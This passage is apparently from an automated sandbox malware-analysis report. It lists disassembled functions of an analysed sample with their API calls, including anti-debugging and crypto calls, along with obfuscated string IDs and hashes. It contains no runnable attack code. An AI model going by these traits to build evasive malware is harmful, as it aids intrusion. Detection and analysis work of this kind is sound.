                                                                                                                                                                    • Instruction ID: 4dbe900a0ce4a0417d15eaa410a928df5a243588c589a682a1a946832d031a1a
                                                                                                                                                                    • Opcode Fuzzy Hash: dc7b02bc7a504f091312e3e8e5fb95016b71851624fb01fb19e4e6789d61a4c3
                                                                                                                                                                    • Instruction Fuzzy Hash: F421AC32600200EADB348FA4D805BA7B7A7EF96F54B6A8525F90AD7210E732DF40D374
                                                                                                                                                                    Function 00DA2A13 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E783: GetLastError.KERNEL32(00000000,?,00DA0AB9), ref: 00D9E787
                                                                                                                                                                      • Part of subcall function 00D9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00D9B9D2), ref: 00D9E829
                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00DA2B1B
                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00DA2B59
                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00DA2B6C
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00DA2BB4
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00DA2BCF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 415426439-0
                                                                                                                                                                    • Opcode ID: 1db41d8ced2c68efb93eb4824350707cc8e832f0d1b4fd71372b4f05a342c3b7
                                                                                                                                                                    • Instruction ID: 026f54ac38aac61291b61099152ba47e0bb7c807c13bd6ee2e1f96e6a0f64e50
                                                                                                                                                                    • Opcode Fuzzy Hash: 1db41d8ced2c68efb93eb4824350707cc8e832f0d1b4fd71372b4f05a342c3b7
                                                                                                                                                                    • Instruction Fuzzy Hash: 0E516D71A01215AFDF20DFAACC81ABE77B8EF16700F184569E910E7190EBB0DA44DB71
                                                                                                                                                                    Function 00D91614 Relevance: 7.7, APIs: 5, Instructions: 171fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D91098: _strlen.LIBCMT ref: 00D910F9
                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00D91685
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00D916AB
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00D916BA
                                                                                                                                                                    • _strlen.LIBCMT ref: 00D91705
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00D91805
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1490117831-0
                                                                                                                                                                    • Opcode ID: 32d7dbac6a213fc8e405f5c02e412e6e7429e594e9b91a8712d92009f41be623
                                                                                                                                                                    • Instruction ID: 3d0211ecf7361905dfe551f0b975615fc969237d47d3b98ba95104533fd37399
                                                                                                                                                                    • Opcode Fuzzy Hash: 32d7dbac6a213fc8e405f5c02e412e6e7429e594e9b91a8712d92009f41be623
                                                                                                                                                                    • Instruction Fuzzy Hash: 4151DDB5908302EBDB00AF24DC84B2ABBE5FF88314F154A2DF88997351E734D9448B72
                                                                                                                                                                    Function 00421E5D Relevance: 7.0, Strings: 5, Instructions: 771COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: *5"6$2'B$;?9?$<::"$|z{s
                                                                                                                                                                    • API String ID: 0-2233493934
                                                                                                                                                                    • Opcode ID: 3a5c8ca05ea6c0ff49f7d0355cef58fe36e2729af9ac7cd9e0ff7280b6bc388c
                                                                                                                                                                    • Instruction ID: 31cb32e2952eeb5aed6972eb9c42189e7d299ecb1d180cd1af740fb1545a0b43
                                                                                                                                                                    • Opcode Fuzzy Hash: 3a5c8ca05ea6c0ff49f7d0355cef58fe36e2729af9ac7cd9e0ff7280b6bc388c
                                                                                                                                                                    • Instruction Fuzzy Hash: 4B421135608312DFD318CF28EC5062AB3E2FBCA315F59893CE99697391EB34A915CB45
                                                                                                                                                                    Function 0041C84E Relevance: 6.7, Strings: 5, Instructions: 460COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: OPq$#K#M$.S'U$9[|]$wy
                                                                                                                                                                    • API String ID: 0-3101808513
                                                                                                                                                                    • Opcode ID: ae791013f75915224645d429e3e48cadc28e70b9a9d6946a843c06380c1750ee
                                                                                                                                                                    • Instruction ID: 5fa6e41981c0831dd4ec5c839a58323b70f6fb27576189598393d7bcf829b61f
                                                                                                                                                                    • Opcode Fuzzy Hash: ae791013f75915224645d429e3e48cadc28e70b9a9d6946a843c06380c1750ee
                                                                                                                                                                    • Instruction Fuzzy Hash: EFC1D1B6E402258BCB24CFA4C8913EFB7B2FF95701F194159E8857B345E7395802CB98
                                                                                                                                                                    Function 00427870 Relevance: 6.5, Strings: 5, Instructions: 288COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: )*$IJ$Q6UH$T2O4$X>I0
                                                                                                                                                                    • API String ID: 0-1099045505
                                                                                                                                                                    • Opcode ID: 9365707c404be2698cf9a05914d124c7d3878b057f98c579c3d4a821c87a109c
                                                                                                                                                                    • Instruction ID: 3b1423c738d2acf67b80311c3b3b65470ac689b0e831acf1128768528a4d1599
                                                                                                                                                                    • Opcode Fuzzy Hash: 9365707c404be2698cf9a05914d124c7d3878b057f98c579c3d4a821c87a109c
                                                                                                                                                                    • Instruction Fuzzy Hash: 357102B660C3218BC714CF68D89136BB7E1FF85354F49892DE8D58B391E3789A05C78A
                                                                                                                                                                    Function 00DA375A Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DA384A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                    • Opcode ID: 2d14cef21292f10e5593b6ccf3bfa48eff40f7491a6616d560753801a45dd5ef
                                                                                                                                                                    • Instruction ID: d5687e0ffc7caa4e73635a7d3c740480b2f291e4ae22ccb610c7faae6ca46b13
                                                                                                                                                                    • Opcode Fuzzy Hash: 2d14cef21292f10e5593b6ccf3bfa48eff40f7491a6616d560753801a45dd5ef
                                                                                                                                                                    • Instruction Fuzzy Hash: 8771B5B1D05158AFDF20EF68DC9DAAAB7BAEB06300F1845D9F04993211DA358F849F30
                                                                                                                                                                    Function 00D95020 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D9502C
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00D950F8
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D95111
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00D9511B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                    • Opcode ID: 6f445ee5b5de75ed6dfbb2658318ada7b13dd4904521bde64863eaa225275a73
                                                                                                                                                                    • Instruction ID: a9c87d425dbed86d9336bc530b32134d90064b4263988bf675de06246cdbc428
                                                                                                                                                                    • Opcode Fuzzy Hash: 6f445ee5b5de75ed6dfbb2658318ada7b13dd4904521bde64863eaa225275a73
                                                                                                                                                                    • Instruction Fuzzy Hash: 9431F975D05319DBDF21EF64D9497CDBBB8AF08300F1041AAE40DAB250EB719B858F55
                                                                                                                                                                    Function 004310F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                                                                                    • Opcode ID: 932f3a8baaf2f4c12b15b1271b6f04031b308d53098c167ea3f8c5ae8c32a5f3
                                                                                                                                                                    • Instruction ID: 04d46c727a6fcf63ca4183bf7cfccd4dfebfccbbcb55db5b15a838c0db64b75f
                                                                                                                                                                    • Opcode Fuzzy Hash: 932f3a8baaf2f4c12b15b1271b6f04031b308d53098c167ea3f8c5ae8c32a5f3
                                                                                                                                                                    • Instruction Fuzzy Hash: D4A15DB05097818FE760DF55D54879ABBE0ABC5308F00892EE5AD9B252C7B86448CF9A
                                                                                                                                                                    Function 00418782 Relevance: 5.3, Strings: 4, Instructions: 287COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 2C$EA$NV$ZY
                                                                                                                                                                    • API String ID: 0-49861532
                                                                                                                                                                    • Opcode ID: e4122abb0b42cb9d4564642bdb55543d7360135ed1a3782e49d3949a9c958459
                                                                                                                                                                    • Instruction ID: 6257ed46bba85acc92184adddb57fb7eb053b09438e58da646b00c9723c3129f
                                                                                                                                                                    • Opcode Fuzzy Hash: e4122abb0b42cb9d4564642bdb55543d7360135ed1a3782e49d3949a9c958459
                                                                                                                                                                    • Instruction Fuzzy Hash: BB91A9B4104701DFDB248F25D8906667BB1FF4A704F1589ADC89A8F35ADB39E881CF94
                                                                                                                                                                    Function 004161FA Relevance: 5.1, Strings: 3, Instructions: 1361COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: H%C'$f!K#$p-./
                                                                                                                                                                    • API String ID: 0-2974429307
                                                                                                                                                                    • Opcode ID: 24c5f14ab80120a87f909f58d4f3cdcffd5a9c39c83a58f1ecb74f99ea2041c3
                                                                                                                                                                    • Instruction ID: f51800d709bb49b49c37dc47da6f8ce97411645a88a1b5d3b75bbaeb89ec4e47
                                                                                                                                                                    • Opcode Fuzzy Hash: 24c5f14ab80120a87f909f58d4f3cdcffd5a9c39c83a58f1ecb74f99ea2041c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 0D92DD75200701CFD724CF29C891763B7E2FF9A314B19896ED8968BB91E739E842CB14
                                                                                                                                                                    Function 00D9123B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85encryptionCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptContextAddRef.ADVAPI32(00000000,00000000,00000000), ref: 00D912C7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ContextCrypt
                                                                                                                                                                    • String ID: [+]
                                                                                                                                                                    • API String ID: 3075001677-4228040803
                                                                                                                                                                    • Opcode ID: 1c9a84ae324317935b6448aaab2c9e82cfccd63f078215b65afd2386026037e0
                                                                                                                                                                    • Instruction ID: d9c024e2925dc2e33f047d9b67102d6e94abe0d244aa596e340aa5f2a7010560
                                                                                                                                                                    • Opcode Fuzzy Hash: 1c9a84ae324317935b6448aaab2c9e82cfccd63f078215b65afd2386026037e0
                                                                                                                                                                    • Instruction Fuzzy Hash: A631F73560C3818FDB26AB3468997EBBBD0ABBD318F18097DD8C987243D1615446CB72
                                                                                                                                                                    Function 0042B641 Relevance: 3.0, Strings: 2, Instructions: 467COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ido1$kvri
                                                                                                                                                                    • API String ID: 0-1372408504
                                                                                                                                                                    • Opcode ID: 7d715f03c417f409de8652eb1d818ab92eb4fc9fe7142f8cb010c132346da33c
                                                                                                                                                                    • Instruction ID: d63b2dff0a2d8081cc2d2a2520883f01022b2cf2ab299a95e8ea2bcb53456646
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d715f03c417f409de8652eb1d818ab92eb4fc9fe7142f8cb010c132346da33c
                                                                                                                                                                    • Instruction Fuzzy Hash: DCE135702047918FD725CF29D490762BBE2EF97314F18C59EC4DA4B7A2C739A846CB94
                                                                                                                                                                    Function 0040B35D Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: vz$(*
                                                                                                                                                                    • API String ID: 0-1810138279
                                                                                                                                                                    • Opcode ID: bc795fc9593d117f69d9b309d8d1678bdc7bb38d1fb9af47afbff97a2df02f4c
                                                                                                                                                                    • Instruction ID: 373eca2d3372cdd70558ea5784a7e56b1569bdbd69d34e33fac87daed3807233
                                                                                                                                                                    • Opcode Fuzzy Hash: bc795fc9593d117f69d9b309d8d1678bdc7bb38d1fb9af47afbff97a2df02f4c
                                                                                                                                                                    • Instruction Fuzzy Hash: 490286B5204701CFD324CF25E991B267BF1FB8A300F1685BDE19A8B662DB74A446CF58
                                                                                                                                                                    Function 0042C661 Relevance: 2.8, Strings: 2, Instructions: 292COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: k$XM$02
                                                                                                                                                                    • API String ID: 0-3645340089
                                                                                                                                                                    • Opcode ID: a66173981124d7008d27a57aeb78949d0a0e602045b34e4fd00f402ea6ce836f
                                                                                                                                                                    • Instruction ID: 13d92fa4c31d488c60226f1b790a3187eebd04651bff5118c22f23bcf6eb8d79
                                                                                                                                                                    • Opcode Fuzzy Hash: a66173981124d7008d27a57aeb78949d0a0e602045b34e4fd00f402ea6ce836f
                                                                                                                                                                    • Instruction Fuzzy Hash: AC8107706047918BD3258F2AD490327FBE1AF97304F68C59ED4DA8B392CB79A407CB55
                                                                                                                                                                    Function 0042C6B0 Relevance: 2.8, Strings: 2, Instructions: 287COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: k$XM$02
                                                                                                                                                                    • API String ID: 0-3645340089
                                                                                                                                                                    • Opcode ID: 88e8cb6286f2b67592398981c80a604d80a239687b165b3d892a7056be522567
                                                                                                                                                                    • Instruction ID: 8486a6ca6ef0432e73a64b8f33dca97ee1ff33de2e9125a755b692dfa59e889f
                                                                                                                                                                    • Opcode Fuzzy Hash: 88e8cb6286f2b67592398981c80a604d80a239687b165b3d892a7056be522567
                                                                                                                                                                    • Instruction Fuzzy Hash: 3481E6706047928BD7158F3A9490327BBE1AF97304F68C5AED0DA8B392CB79A407CB55
                                                                                                                                                                    Function 0042C69E Relevance: 2.8, Strings: 2, Instructions: 259COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: k$XM$02
                                                                                                                                                                    • API String ID: 0-3645340089
                                                                                                                                                                    • Opcode ID: 3cc09609d5efc333a6acc8853371c99c98345936378cdd70d2903306b9378b24
                                                                                                                                                                    • Instruction ID: f50683e4a251d12fd46d261370c77af8c449dc8eb74b8725cadbfee1003f3c0d
                                                                                                                                                                    • Opcode Fuzzy Hash: 3cc09609d5efc333a6acc8853371c99c98345936378cdd70d2903306b9378b24
                                                                                                                                                                    • Instruction Fuzzy Hash: 1971D2716047918BD3168F2A9490326FFE2AFA7304F68C59ED0DA4B392C779A407CB95
                                                                                                                                                                    Function 0042CC0E Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: k$XM$02
                                                                                                                                                                    • API String ID: 0-3645340089
                                                                                                                                                                    • Opcode ID: ca4ee5496d6531026c593b85f0285854670459727e068aaa3c7d207f64eb9cf2
                                                                                                                                                                    • Instruction ID: aa126381ea6bb095719112affaf45f40dadcdf94d3070ec07542df453e69526b
                                                                                                                                                                    • Opcode Fuzzy Hash: ca4ee5496d6531026c593b85f0285854670459727e068aaa3c7d207f64eb9cf2
                                                                                                                                                                    • Instruction Fuzzy Hash: 627104706047918BD3168F2A9490367FFE2AFA7304F68C59ED0DA4B392C779A407CB95
                                                                                                                                                                    Function 0041703C Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: H.M $T"D$
                                                                                                                                                                    • API String ID: 0-2923313461
                                                                                                                                                                    • Opcode ID: 66fb479fc717423183890f232c5f54e904ecc4e71b7d6a62289c9005d4df4375
                                                                                                                                                                    • Instruction ID: 63a4b4535a0efdea7b6357f2346164b773affaf991aad46119c0a3f7eb62c0b6
                                                                                                                                                                    • Opcode Fuzzy Hash: 66fb479fc717423183890f232c5f54e904ecc4e71b7d6a62289c9005d4df4375
                                                                                                                                                                    • Instruction Fuzzy Hash: AC51D6756047008FD325CF28C881BA3B7F2EF96310F19855EE8A68B391D738E842C764
                                                                                                                                                                    Function 0042AFFD Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: LwtJ$rFDN
                                                                                                                                                                    • API String ID: 0-1255102257
                                                                                                                                                                    • Opcode ID: b4ef04f43239fa8514196e7e22a69623b4eb3b380d4fd1e3232350cc137b7b56
                                                                                                                                                                    • Instruction ID: 23657ca543885c4e7040de47d94f52d02b11e6d88161757131fbadc548fb3af2
                                                                                                                                                                    • Opcode Fuzzy Hash: b4ef04f43239fa8514196e7e22a69623b4eb3b380d4fd1e3232350cc137b7b56
                                                                                                                                                                    • Instruction Fuzzy Hash: 2D5124706087928FD715CF26D4A0272BBE2EF97314B28C49EC0C68B746CB39980BCB54
                                                                                                                                                                    Function 0042AF44 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: LwtJ$rFDN
